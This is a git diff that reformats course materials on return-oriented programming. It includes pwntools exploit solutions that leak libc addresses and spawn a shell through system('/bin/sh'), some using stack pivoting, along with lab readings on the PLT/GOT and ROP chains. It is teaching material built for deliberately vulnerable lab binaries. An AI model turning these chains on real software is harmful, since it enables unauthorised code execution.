a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_ret2main.py b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_ret2main.py index 754ea8b..baaf122 100644 --- a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_ret2main.py +++ b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_ret2main.py @@ -2,31 +2,40 @@ binary = "rop_limited" -context.log_level = 'error' +context.log_level = "error" context.binary = binary p = process(binary) elf = ELF(binary) -libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` +libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` off = 0x38 pop_rdi = 0x0000000000401203 pop_rsi_r15 = 0x0000000000401201 -pop_rdx = 0x000000000040113a +pop_rdx = 0x000000000040113A # write(1, read@got, 8) -leak_chain = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['write']) +leak_chain = ( + p64(pop_rdi) + + p64(1) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["write"]) +) chain = b"A" * off + leak_chain + p64(elf.entry) p.send(chain + b" " * (0x80 - len(chain))) read_addr = u64(p.recv(8)) -libc.address = read_addr - libc.symbols['read'] +libc.address = read_addr - libc.symbols["read"] sh = next(libc.search(b"/bin/sh\x00")) # system("/bin/sh") -call_system_chain = p64(pop_rdi) + p64(sh) + p64(libc.symbols['system']) +call_system_chain = p64(pop_rdi) + p64(sh) + p64(libc.symbols["system"]) chain = b"A" * off + call_system_chain + p64(elf.entry) p.send(chain + b" " * (0x80 - len(chain))) diff --git a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_stack_pivot.py b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_stack_pivot.py index 92d72ec..88f46e2 100644 --- a/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_stack_pivot.py +++ b/chapters/exploitation-techniques/return-oriented-programming-advanced/drills/02-low-stack-space/sol/exploit_stack_pivot.py @@ -2,40 +2,67 @@ binary = "rop_limited" -context.log_level = 'error' +context.log_level = "error" context.binary = binary p = process(binary) elf = ELF(binary) -libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` +libc = ELF("/usr/lib/libc.so.6") # from `ldd rop` off = 0x30 pop_rdi = 0x0000000000401203 pop_rsi_r15 = 0x0000000000401201 -pop_rdx = 0x000000000040113a +pop_rdx = 0x000000000040113A leave_ret = 0x0000000000401162 buf = 0x00404800 # read(0, buf, 0x100) -new_stack_read = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(buf) + p64(0) + p64(pop_rdx) + p64(0x100) + p64(elf.plt['read']) +new_stack_read = ( + p64(pop_rdi) + + p64(0) + + p64(pop_rsi_r15) + + p64(buf) + + p64(0) + + p64(pop_rdx) + + p64(0x100) + + p64(elf.plt["read"]) +) # write(1, read@got, 8) -leak_chain = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['write']) +leak_chain = ( + p64(pop_rdi) + + p64(1) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["write"]) +) # read(0, read@got, 8) -ow_got_chain = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(elf.got['read']) + p64(0) + p64(pop_rdx) + p64(8) + p64(elf.plt['read']) +ow_got_chain = ( + p64(pop_rdi) + + p64(0) + + p64(pop_rsi_r15) + + p64(elf.got["read"]) + + p64(0) + + p64(pop_rdx) + + p64(8) + + p64(elf.plt["read"]) +) # read(buf) -> system("/bin/sh") -call_system_chain = p64(pop_rdi) + p64(buf + 8 * 19) + p64(elf.plt['read']) +call_system_chain = p64(pop_rdi) + p64(buf + 8 * 19) + p64(elf.plt["read"]) -chain = b"A" * off + p64(buf-8) + new_stack_read + p64(leave_ret) +chain = b"A" * off + p64(buf - 8) + new_stack_read + p64(leave_ret) p.send(chain + b" " * (0x80 - len(chain))) chain = leak_chain + ow_got_chain + call_system_chain + b"/bin/sh\x00" p.send(chain + b" " * (0x100 - len(chain))) read_addr = u64(p.recv(8)) -libc.address = read_addr - libc.symbols['read'] +libc.address = read_addr - libc.symbols["read"] -p.send(p64(libc.symbols['system'])) +p.send(p64(libc.symbols["system"])) p.interactive() diff --git a/chapters/exploitation-techniques/return-oriented-programming-advanced/reading/README.md b/chapters/exploitation-techniques/return-oriented-programming-advanced/reading/README.md index 74d66ab..198a177 100644 --- a/chapters/exploitation-techniques/return-oriented-programming-advanced/reading/README.md +++ b/chapters/exploitation-techniques/return-oriented-programming-advanced/reading/README.md @@ -1,37 +1,19 @@ ---- -linkTitle: Return Oriented Programming Advanced -type: docs -weight: 10 ---- +# Return-Oriented Programming Advanced -# Return Oriented Programming Advanced +In this session we are going to dive deeper into Return-Oriented Programming and setbacks that appear in modern exploitation. +Topics covered: -## Table of Contents +- ROP for syscalls and 64 bits +- Dealing with ASLR in ROP +- Dealing with low space in the overflown buffer +- Combining ROP and shellcodes -* [Return Oriented Programming Advanced](#return-oriented-programming-advanced) - * [Calling Conventions in the ROP Context](#calling-conventions-in-the-rop-context) - * [ROP gadgets on x86_64](#rop-gadgets-on-x86_64) - * [Libc leaks](#libc-leaks) - * [Challenges](#challenges) - * [01. Challenge - Using ROP to Leak and Call system](#01-challenge---using-rop-to-leak-and-call-system) - * [02. Challenge - Handling Low Stack Space](#02-challenge---handling-low-stack-space) - * [03. Challenge - Stack Pivoting](#03-challenge---stack-pivoting) - * [04. Challenge - mprotect](#04-challenge---mprotect) - * [Further Reading](#further-reading) - - -In this lab we are going to dive deeper into *Return Oriented Programming* and setbacks that appear in modern exploitation. Topics covered: - - * ROP for syscalls and 64 bits - * Dealing with ASLR in ROP - * Dealing with low space in the overflown buffer - * Combining ROP and shellcodes - -As the basis of the lab we will use a program based on a classical CTF challenge called *ropasaurusrex* and gradually make exploitation harder. +As the basis of the lab we will use a program based on a classical CTF challenge called `ropasaurusrex` and gradually make exploitation harder. ## Calling Conventions in the ROP Context -As you know, the calling convention for 32 bits uses the stack. This means that setting up parameters is as easy as just writing them in the payload. +As you know, the calling convention for 32 bits uses the stack. +This means that setting up parameters is as easy as just writing them in the payload. We can see how a function call is generated in this [Compiler Explorer example](https://gcc.godbolt.org/z/MPG5MhEnE). @@ -61,10 +43,12 @@ syscall ## ROP gadgets on x86_64 -On `x86_64` the ROP payloads will have to be built differently than on `x86` because of the different calling convention. Having the function arguments stored in registers means that you don't need to do stack cleanup anymore, but you will need gadgets with **specific registers** to pop the arguments into. +On `x86_64` the ROP payloads will have to be built differently than on `x86` because of the different calling convention. +Having the function arguments stored in registers means that you don't need to do stack cleanup anymore, but you will need gadgets with **specific registers** to pop the arguments into. -For example to do the `read(0, buf, size)` *libc call* to do this call your payload will need to look like: -``` +For example to do the `read(0, buf, size)` libc call to do this call your payload will need to look like: + +```text pop rdi; ret 0 pop rsi, ret @@ -76,11 +60,14 @@ call read@plt ## Libc leaks -You might have already encountered in other tasks the need to leak values or addresses. Most of the time, if you want to get a shell, you won't have a convenient `system@plt` symbol present in your binary, and ASLR will most often be activated; so you will have to compute it relative to another libc symbol at runtime. +You might have already encountered in other tasks the need to leak values or addresses. +Most of the time, if you want to get a shell, you won't have a convenient `system@plt` symbol present in your binary, and `ASLR` will most often be activated; +so you will have to compute it relative to another libc symbol at runtime. -For this we will need to know what libc library the program is loading. For a local executable we can just run `ldd`: +For this we will need to know what libc library the program is loading. +For a local executable we can just run `ldd`: -``` +```console $ ldd rop linux-vdso.so.1 (0x00007ffd0834b000) libc.so.6 => /usr/lib/libc.so.6 (0x00007fec18eb6000) @@ -89,8 +76,8 @@ $ ldd rop For remote tasks you can might get an attached `libc.so`, or you can use the [Libc database](https://libc.blukat.me/) to find the correct libc based on some leaked offsets. - How to compute and use the `system` function address using pwntools: + ```python from pwn import * @@ -110,110 +97,146 @@ payload = ... + p64(libc.symbols['system']) ## Challenges -**NOTE**: All tasks from this session are 64 bit binaries, so take that into consideration when you build the ROP chains. +**Note**: All tasks from this session are 64 bit binaries, so take that into consideration when you build the ROP chains. ### 01. Challenge - Using ROP to Leak and Call system Use the `01-leak-call-system/src` executable file in order to spawn a shell. -You can now call the functions in the binary but `system` or any other appropriate function is missing and ASLR is enabled. How do you get past this? You need an information leak! To leak information we want to print it to standard output and process it. -We use calls to `printf`, `puts` or `write` for this. In our case we can use the `write` function call. +You can now call the functions in the binary but `system` or any other appropriate function is missing and ASLR is enabled. +How do you get past this? +You need an information leak! +To leak information we want to print it to standard output and process it. +We use calls to `printf`, `puts` or `write` for this. +In our case we can use the `write` function call. -> If you have a string representation of a number you can unpack it using the `unpack`/`u64` function in pwntools. It is the reverse of the `pack`/`p64` function. +If you have a string representation of a number you can unpack it using the `unpack`/`u64` function in pwntools. +It is the reverse of the `pack`/`p64` function. First, trigger the information leak by calling the `write` function and leaking an address from libc. -> You can use the GOT table storing libc addresses. +You can use the GOT table storing libc addresses. -You need to read the output from the above `write` call. Use `p.recv(8)` in the Python script to read the 8 bytes output of the `write` call in the ROP chain. +You need to read the output from the above `write` call. +Use `p.recv(8)` in the Python script to read the 8 bytes output of the `write` call in the ROP chain. -> Remember that you need gadgets to pop values into rdi, rsi, rdx for the `write` call. +Remember that you need gadgets to pop values into rdi, rsi, rdx for the `write` call. Find the address of the `system` call. -> Remember the libc leaks section above +Remember the libc leaks section above -Call `system`. +Call `system(). -> You can't write the `system` address in the ROP chain as it is different each time and the ROP chain is statically defined. You can use the GOT table again. Write an entry in the GOT table with the newly found address and call the function for that entry. It will evolve into a call to `system`. -> -> To write an entry in the GOT table use the `read` call in the ROP chain. You will feed to `read` the computed address below. -> -> For the actual parameter use the `"sh"` string already present in the vulnerable binary. Use searchmem in GDB to find the `"sh"` string in the executable. +You can't write the `system` address in the ROP chain as it is different each time and the ROP chain is statically defined. +You can use the GOT table again. +Write an entry in the GOT table with the newly found address and call the function for that entry. +It will evolve into a call to `system`. + +To write an entry in the GOT table use the `read` call in the ROP chain. +You will feed to `read` the computed address below. + +For the actual parameter use the `"sh"` string already present in the vulnerable binary. +Use searchmem in GDB to find the `"sh"` string in the executable. ### 02. Challenge - Handling Low Stack Space -The previous binary had the luxury of plenty of stack space to be overflown. It is often the case that we don't have enough space for a long ROP chain. Let's handle that. +The previous binary had the luxury of plenty of stack space to be overflown. +It is often the case that we don't have enough space for a long ROP chain. +Let's handle that. -For the current task, switch to the `02-low-stack-space/src` sub-folder. The extra constraint here is that huge ropchains are no longer an option. +For the current task, switch to the `02-low-stack-space/src` sub-folder. +The extra constraint here is that huge ropchains are no longer an option. Find out how much space you have in the overflow and assess the situation. -> Use `gdb` and the cyclic pattern to get the information required. +Use `gdb` and the cyclic pattern to get the information required. Now follow the steps below. First trigger the info leak as before. -> Use `write` and leak the address of a GOT value. Use this to compute the address of the `system` call. +Use `write` and leak the address of a GOT value. +Use this to compute the address of the `system` call. + +You can only construct a partial ropchain. +A longer one won't fit. +So after calling `write`, call `main` again. -You can only construct a partial ropchain. A longer one won't fit. So after calling `write`, call `main` again. +Note that using `sendline` means sending out a newline character (`'\n'`) at the end of the message. +If you want to strictly send out a message without a newline, use `send`. -> Note that using `sendline` means sending out a newline character (`'\n'`) at the end of the message. If you want to strictly send out a message without a newline, use `send`. -> -> Find the address of `main` by looking at the argument for the `__libc_start_main` function. Check the disassembling of the program and see what is the parameter passed to the `__libc_start_main call`. -> -> After calling `main` again you will get back to the initial situation where you can exploit the buffer overflow. +Find the address of `main` by looking at the argument for the `__libc_start_main` function. +Check the disassembling of the program and see what is the parameter passed to the `__libc_start_main call`. + +After calling `main` again you will get back to the initial situation where you can exploit the buffer overflow. Insert `"sh"` string. -> This time you don't have the `"sh"` string in the binary, but you can find it in **the libc binary itself** so you can compute it the same way you compute the `system` address. In pwntools: -> ```python -> -> sh = next(libc.search(b"/bin/sh\x00")) -> ``` +This time you don't have the `"sh"` string in the binary, but you can find it in **the libc binary itself** so you can compute it the same way you compute the `system` address. +In pwntools: + +```python + +sh = next(libc.search(b"/bin/sh\x00")) +``` Call `system`. ### 03. Challenge - Stack Pivoting -Let's assume that `main` function had additional constraints that made it impossible to repeat the overflow. How can we still solve it? The method is called stack pivoting. In short, this means making the stack pointer refer another (writable) memory area that has enough space, a memory area that we will populate with the actual ROP chain. +Let's assume that `main` function had additional constraints that made it impossible to repeat the overflow. +How can we still solve it? +The method is called stack pivoting. +In short, this means making the stack pointer refer another (writable) memory area that has enough space, a memory area that we will populate with the actual ROP chain. -> Read more about stack pivoting [here](http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html). +Read more about stack pivoting [here](http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html). -Tour goal is to fill the actual ROP chain to a large enough memory area. We need a two stage exploit: +Tour goal is to fill the actual ROP chain to a large enough memory area. +We need a two stage exploit: - * In the first stage, prepare the memory area where to fill the second stage ROP chain; then fill the memory area with the second stage ROP chain. - * In the second stage, create the actual ROP chain and feed it to the program and profit. +- In the first stage, prepare the memory area where to fill the second stage ROP chain; +then fill the memory area with the second stage ROP chain. +- In the second stage, create the actual ROP chain and feed it to the program and profit. Follow the steps below. -Use pmap or vmmap in `pwndbg` to discover the writable data section of the process. Select an address in that section (**don't** use the start address). This is where you fill the 2nd stage data (the actual ROP chain). +Use pmap or vmmap in `pwndbg` to discover the writable data section of the process. +Select an address in that section (**don't** use the start address). +This is where you fill the 2nd stage data (the actual ROP chain). -> Who not use the start address? Because `pop` instructions (which decrease the `rsp`) will go outside the memory region. +Who not use the start address? +Because `pop` instructions (which decrease the `rsp`) will go outside the memory region. -Create a first stage payload that calls `read` to store the 2nd stage data to the newly found memory area. After that pivot the stack pointer to the memory area address. +Create a first stage payload that calls `read` to store the 2nd stage data to the newly found memory area. +After that pivot the stack pointer to the memory area address. -> At a given address in the executable you have a call to `read` followed by a `leave; ret` gadget. This sequence of instructions allows you to read data and then pivot the stack. -> -> The leave instruction fills the stack pointer (`rsp`) with the address of the frame pointer (`rbp`). It's equivalent to: -> ```asm -> mov rsp, rbp -> pop rbp -> ``` -Write the actual ROP chain as a second stage payload like when we didn't have space constraints. The 2nd stage will be stored to the memory area and the stack pointer will point to that. +At a given address in the executable you have a call to `read` followed by a `leave; ret` gadget. +This sequence of instructions allows you to read data and then pivot the stack. -> **Important!** Be careful when and where the stack pivoting takes place. After the `mov rsp, rbp` part of the `leave` instruction happens your stack will be pivoted, so the following `pop rbp` will happen **on the new stack**. Take this offset into account when building the payload. +The leave instruction fills the stack pointer (`rsp`) with the address of the frame pointer (`rbp`). +It's equivalent to: -### 04. Challenge - mprotect +```asm +mov rsp, rbp +pop rbp +``` -Combine everything you've learned until now and develop a complex payload to call `mprotect` to change the permissions on a memory region to read+write+execute and then instert a *shellcode* to call `system("/bin/sh")`. +Write the actual ROP chain as a second stage payload like when we didn't have space constraints. +The 2nd stage will be stored to the memory area and the stack pointer will point to that. +**Important!** +Be careful when and where the stack pivoting takes place. +After the `mov rsp, rbp` part of the `leave` instruction happens your stack will be pivoted, so the following `pop rbp` will happen **on the new stack**. +Take this offset into account when building the payload. -## Further Reading +### 04. Challenge - mprotect + +Combine everything you've learned until now and develop a complex payload to call `mprotect` to change the permissions on a memory region to read+write+execute and then instert a shellcode to call `system("/bin/sh")`. - * https://syscalls.kernelgrok.com/ - * http://articles.manugarg.com/systemcallinlinux2_6.html - * https://eli.thegreenplace.net/2011/11/03/position-independent-code-pic-in-shared-libraries#the-procedure-linkage-table-plt - * https://github.com/Gallopsled/pwntools-tutorial/tree/master/walkthrough +## Further Reading +- +- +- +- diff --git a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit.py b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit.py index f39de66..8b06d16 100644 --- a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit.py +++ b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit.py @@ -2,13 +2,18 @@ from pwn import * + # Print byte array as hex string "\x..\x..\x.." def print_byte_array(prefix, array): - log.info("{}: {}".format(prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))))) + log.info( + "{}: {}".format( + prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))) + ) + ) # Change to 'debug' for extensive information on classes used. -context.log_level = 'info' +context.log_level = "info" filename = "../src/vuln" e = ELF(filename) @@ -19,7 +24,7 @@ def print_byte_array(prefix, array): starcraft_address = e.symbols[b"starcraft"] starcraft_inner_address = 0x08048519 pop_ret_gadget_address = 0x08048331 -pop_pop_ret_gadget_address = 0x080485ea +pop_pop_ret_gadget_address = 0x080485EA print("diablo: 0x{:08x}".format(diablo_address)) print("warcraft: 0x{:08x}".format(warcraft_address)) @@ -29,9 +34,19 @@ def print_byte_array(prefix, array): # buffer is at ebp-0x40 # return address is at ebp+0x4 offset = 0x44 -#payload = offset * b"A" + pack(warcraft_address) -#payload = offset * b"A" + pack(overwatch_address) + pack(pop_ret_gadget_address) + pack(0xdeadbeef) + pack(warcraft_address) -payload = offset * b"A" + pack(diablo_address) + pack(pop_pop_ret_gadget_address) + pack(0x12345678) + pack(0xaabbccdd) + pack(overwatch_address) + pack(pop_ret_gadget_address) + pack(0xdeadbeef) + pack(warcraft_address) +# payload = offset * b"A" + pack(warcraft_address) +# payload = offset * b"A" + pack(overwatch_address) + pack(pop_ret_gadget_address) + pack(0xdeadbeef) + pack(warcraft_address) +payload = ( + offset * b"A" + + pack(diablo_address) + + pack(pop_pop_ret_gadget_address) + + pack(0x12345678) + + pack(0xAABBCCDD) + + pack(overwatch_address) + + pack(pop_ret_gadget_address) + + pack(0xDEADBEEF) + + pack(warcraft_address) +) """ low address diff --git a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit64.py b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit64.py index 2baed4f..03f87b4 100644 --- a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit64.py +++ b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/sol/exploit64.py @@ -2,18 +2,23 @@ from pwn import * + # Print byte array as hex string "\x..\x..\x.." def print_byte_array(prefix, array): - log.info("{}: {}".format(prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))))) + log.info( + "{}: {}".format( + prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))) + ) + ) # Change to 'debug' for extensive information on classes used. -context.log_level = 'info' +context.log_level = "info" filename = "../src/vuln64" e = ELF(filename) context.binary = filename -#context.arch = "amd64" +# context.arch = "amd64" diablo_address = e.symbols[b"diablo"] overwatch_address = e.symbols[b"overwatch"] warcraft_address = e.symbols[b"warcraft"] @@ -29,12 +34,20 @@ def print_byte_array(prefix, array): # buffer is at rbp-0x40 # return address is at rbp+0x8 offset = 0x48 -#payload = offset * b"A" + pack(warcraft_address) -#payload = offset * b"A" + pack(pop_rdi_ret_gadget_address) + pack(0xdeadbeef) + pack(overwatch_address) -payload = offset * b"A" + pack(pop_rdi_ret_gadget_address) + pack(0x12345678) + pack(pop_rsi_r15_gadget_address) + pack(0xaabbccdd) + pack(0) + pack(diablo_address) +# payload = offset * b"A" + pack(warcraft_address) +# payload = offset * b"A" + pack(pop_rdi_ret_gadget_address) + pack(0xdeadbeef) + pack(overwatch_address) +payload = ( + offset * b"A" + + pack(pop_rdi_ret_gadget_address) + + pack(0x12345678) + + pack(pop_rsi_r15_gadget_address) + + pack(0xAABBCCDD) + + pack(0) + + pack(diablo_address) +) # It won't work. Payload is too large. -#payload = offset * b"A" + pack(pop_rdi_ret_gadget_address) + pack(0xdeadbeef) + pack(overwatch_address) + pack(pop_rdi_ret_gadget_address) + pack(0x12345678) + pack(pop_rsi_r15_gadget_address) + pack(0xaabbccdd) + pack(0) + pack(diablo_address) +# payload = offset * b"A" + pack(pop_rdi_ret_gadget_address) + pack(0xdeadbeef) + pack(overwatch_address) + pack(pop_rdi_ret_gadget_address) + pack(0x12345678) + pack(pop_rsi_r15_gadget_address) + pack(0xaabbccdd) + pack(0) + pack(diablo_address) """ diff --git a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit.py b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit.py index e2a0f6c..1e95019 100644 --- a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit.py +++ b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit.py @@ -2,13 +2,18 @@ from pwn import * + # Print byte array as hex string "\x..\x..\x.." def print_byte_array(prefix, array): - log.info("{}: {}".format(prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))))) + log.info( + "{}: {}".format( + prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))) + ) + ) # Change to 'debug' for extensive information on classes used. -context.log_level = 'info' +context.log_level = "info" filename = "../src/vuln" e = ELF(filename) diff --git a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit64.py b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit64.py index 1c56937..0bc891b 100644 --- a/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit64.py +++ b/chapters/exploitation-techniques/return-oriented-programming/drills/00-demo/src/exploit64.py @@ -2,13 +2,18 @@ from pwn import * + # Print byte array as hex string "\x..\x..\x.." def print_byte_array(prefix, array): - log.info("{}: {}".format(prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))))) + log.info( + "{}: {}".format( + prefix, "".join("\\x{:02x}".format(array[i]) for i in range(0, len(array))) + ) + ) # Change to 'debug' for extensive information on classes used. -context.log_level = 'info' +context.log_level = "info" filename = "../src/vuln64" e = ELF(filename) diff --git a/chapters/exploitation-techniques/return-oriented-programming/drills/03-challenge-no-ret-control/sol/skel.py b/chapters/exploitation-techniques/return-oriented-programming/drills/03-challenge-no-ret-control/sol/skel.py index a2c3785..ff329c5 100755 --- a/chapters/exploitation-techniques/return-oriented-programming/drills/03-challenge-no-ret-control/sol/skel.py +++ b/chapters/exploitation-techniques/return-oriented-programming/drills/03-challenge-no-ret-control/sol/skel.py @@ -2,6 +2,7 @@ from pwn import * + def dw(i): return struct.pack(" @@ -98,14 +51,15 @@ int main(void) ``` After compiling this code, let's look at the call to `puts()`: -``` + +```console $ objdump -D -j .text -M intel hello | grep puts 80483e4: e8 07 ff ff ff call 80482f0 ``` -If we look at the `.plt` section, we see that it starts at address `0x080482e0`, -right where the previous call jumps: -``` +If we look at the `.plt` section, we see that it starts at address `0x080482e0`, right where the previous call jumps: + +```console $ readelf --sections hello [...] [12] .plt PROGBITS 080482e0 0002e0 000040 04 AX 0 0 16 @@ -113,7 +67,8 @@ $ readelf --sections hello ``` Now let's see how the code in `.plt` looks like: -``` + +```console $ objdump -D -j .plt -M intel hello | grep -A 3 '' 080482f0 : 80482f0: ff 25 00 a0 04 08 jmp DWORD PTR ds:0x804a000 @@ -121,9 +76,10 @@ $ objdump -D -j .plt -M intel hello | grep -A 3 '' 80482fb: e9 e0 ff ff ff jmp 80482e0 <_init+0x30> ``` -We see this code performing a jump to address `0x804a000` inside the data -section. Let's check the binary relocations for that location: -``` +We see this code performing a jump to address `0x804a000` inside the data section. +Let's check the binary relocations for that location: + +```console $ readelf --relocs hello [...] Relocation section '.rel.plt' at offset 0x298 contains 3 entries: @@ -133,20 +89,21 @@ Relocation section '.rel.plt' at offset 0x298 contains 3 entries: ``` Ok, good, but what is actually stored at this address initially? -``` + +```console $ objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello hello: file format elf32-i386 - + Contents of section .got.plt: 804a000 f6820408 06830408 16830408 ............ ``` -We recognize `f6820408` (`0x80482f6`) as being the next instruction in the -`puts@plt` stub that we disassembled above. Which then pushes 0 in the stack and -calls 0x80482e0. This is the call to the one-time resolver, and it looks like -this: -``` +We recognize `f6820408` (`0x80482f6`) as being the next instruction in the `puts@plt` stub that we disassembled above. +Which then pushes 0 in the stack and calls 0x80482e0. +This is the call to the one-time resolver, and it looks like this: + +```console $ objdump -D -j .plt -M intel hello | grep -A 3 '080482e0' 080482e0 : @@ -155,35 +112,35 @@ $ objdump -D -j .plt -M intel hello | grep -A 3 '080482e0' 80482ec: 00 00 add BYTE PTR [eax],al ``` -What's going on here? What's actually happening is lazy binding - by convention -when the dynamic linker loads a library, it will put an identifier and -resolution function into known places in the GOT. Therefore, what happens is -roughly this: on the first call of a function, it falls through to call the -default stub, it simply jumps to the next instruction. The identifier is pushed -on the stack, the dynamic linker is called, which at that point has enough -information to figure out “hey, this program is trying to find the function -foo”. It will go ahead and find it, and then patch the address into the GOT such -that the next time the original PLT entry is called, it will load the actual -address of the function, rather than the lookup stub. Ingenious! +What's going on here? +What's actually happening is lazy binding - by convention when the dynamic linker loads a library, it will put an identifier and resolution function into known places in the GOT. +Therefore, what happens is roughly this: on the first call of a function, it falls through to call the default stub, it simply jumps to the next instruction. +The identifier is pushed on the stack, the dynamic linker is called, which at that point has enough information to figure out “hey, this program is trying to find the function foo”. +It will go ahead and find it, and then patch the address into the GOT such that the next time the original PLT entry is called, it will load the actual address of the function, rather than the lookup stub. +Ingenious! ### Further Inspection -Going further into the resolver is left as an exercise. You can use GDB to -inspect the address in `0x8049ffc`, and what happens when this jumps there. +Going further into the resolver is left as an exercise. +You can use GDB to inspect the address in `0x8049ffc`, and what happens when this jumps there. + +## Return Oriented Programming (`ROP`) -## Return Oriented Programming (ROP) ### Motivation -In the previous sessions we discussed `ret2libc` attacks. The standard attack -was to perform an overwrite in the following way: -``` + +In the previous sessions we discussed `ret2libc` attacks. +The standard attack was to perform an overwrite in the following way: + +```text RET + 0x00: addr of system RET + 0x04: JUNK RET + 0x08: address to desired command (e.g. '/bin/sh') ``` -However, what happens when you need to call multiple functions? Say you need -to call `f1()` and then `f2(0xAB, 0xCD)`? The payload should be: -``` +However, what happens when you need to call multiple functions? +Say you need to call `f1()` and then `f2(0xAB, 0xCD)`? The payload should be: + +```text RET + 0x00: addr of f1 RET + 0x04: addr of f2 (return address after f1 finishes) RET + 0x08: JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called) @@ -192,7 +149,8 @@ RET + 0x10: 0xCD (param2 of f2) ``` What about if we need to call `f1(0xAB, 0xCD)` and then `f2(0xEF, 0x42)`? -``` + +```text RET + 0x00: addr of f1 RET + 0x04: addr of f2 (return address after f1 finishes) RET + 0x08: 0xAB (param1 of f1) @@ -201,41 +159,47 @@ RET + 0x10: 0x42 (param2 of f2) ``` ### NOP Analogy -While `ret2libc` uses functions directly, ROP uses a finer level of code -execution: instruction groups. Let's explore an example: + +While `ret2libc` uses functions directly, `ROP` uses a finer level of code execution: instruction groups. +Let's explore an example: + ```c int main(void) { char a[16]; read(0, a, 100); - + return 0; } ``` -This code obviously suffers from a stack buffer overflow. The offset to the -return address is 24. So `DOWRD`s from offset 24 onwards will be popped from the -stack and executed. Remember the `NOP` sled concept from previous sessions? -These were long chains of `NOP` instructions (`\x90`) used to pad a payload for -alignment purposes. Since we can't add any new code to the program (_NX_ is -enabled) how could we simulate the effect of a `NOP` sled? Easy! Using return -instructions! +This code obviously suffers from a stack buffer overflow. +The offset to the return address is 24. +So `DOWRD`s from offset 24 onwards will be popped from the stack and executed. +Remember the `NOP` sled concept from previous sessions? +These were long chains of `NOP` instructions (`\x90`) used to pad a payload for alignment purposes. +Since we can't add any new code to the program (`NX` is enabled) how could we simulate the effect of a `NOP` sled? +Easy! +Using return instructions! Let's find the `ret` instructions in a would-be binary: -``` + +```console $ objdump -d hello -M intel | grep $'\t'ret - 80482dd: c3 ret - 804837a: c3 ret - 80483b7: c3 ret - 8048437: c3 ret - 8048444: c3 ret - 80484a9: c3 ret - 80484ad: c3 ret + 80482dd: c3 ret + 804837a: c3 ret + 80483b7: c3 ret + 8048437: c3 ret + 8048444: c3 ret + 80484a9: c3 ret + 80484ad: c3 ret 80484c6: c3 ret ``` -Any and all of these addresses will be ok. The payload could be the following: -``` +Any and all of these addresses will be ok. +The payload could be the following: + +```text RET + 0x00: 0x80482dd RET + 0x04: 0x80482dd RET + 0x08: 0x80482dd @@ -243,13 +207,14 @@ RET + 0x0c: 0x80482dd RET + 0x10: 0x80482dd [...] ``` -The above payload will run like so: the original `ret` (in the normal code flow) -will pop `RET+0x00` off the stack and jump to it. When `RET+0x00` gets popped, -the stack is automatically increased by 4 (on to the next value). The -instruction at `0x80482dd` is another `ret`, which does the same thing as before. -This goes on until another address that is not a `ret` is popped off the stack. + +The above payload will run like so: the original `ret` (in the normal code flow) will pop `RET+0x00` off the stack and jump to it. +When `RET+0x00` gets popped, the stack is automatically increased by 4 (on to the next value). +The instruction at `0x80482dd` is another `ret`, which does the same thing as before. +This goes on until another address that is not a `ret` is popped off the stack. In general, you can use the skeleton below to generate payloads: + ```python #! /usr/bin/python3 import struct, sys @@ -268,14 +233,16 @@ payload += dw(0xdeadc0de) sys.stdout.write(payload.decode('ascii', 'replace')) ``` +## Gadgets and `ROP` Chains -## Gadgets and ROP Chains ### Code Execution -Now that we've understood the basics of Return Oriented Programming, let's -actually do something useful. The building blocks of ROP payloads are called -**gadgets**. These are blocks of instructions that end with a `ret` instruction. + +Now that we've understood the basics of Return Oriented Programming, let's actually do something useful. +The building blocks of `ROP` payloads are called **gadgets**. +These 